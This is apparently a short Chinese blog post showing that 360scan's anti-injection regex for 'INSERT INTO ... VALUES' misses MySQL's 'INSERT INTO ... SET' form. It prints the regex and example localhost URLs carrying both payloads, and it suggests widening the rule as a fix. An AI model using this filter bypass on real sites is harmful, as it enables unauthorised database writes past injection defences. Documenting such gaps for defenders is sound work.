Mysql语法绕过360scan insert防注入方法

2023-12-07 0 259

360scan正则:INSERT\\\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

http://localhost/360.php?sql=insert into user (user,pass) values (\’admin\’,\’123456\’)

Mysql语法绕过360scan insert防注入方法

提交set语法:

http://localhost/360.php?sql=insert into user set user=\’admin\’,pass=\’123456\’

Mysql语法绕过360scan insert防注入方法

修复方法当然最好是加上set了。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 脚本攻防 Mysql语法绕过360scan insert防注入方法 https://www.u-9.cn/security/gongfang/124779.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务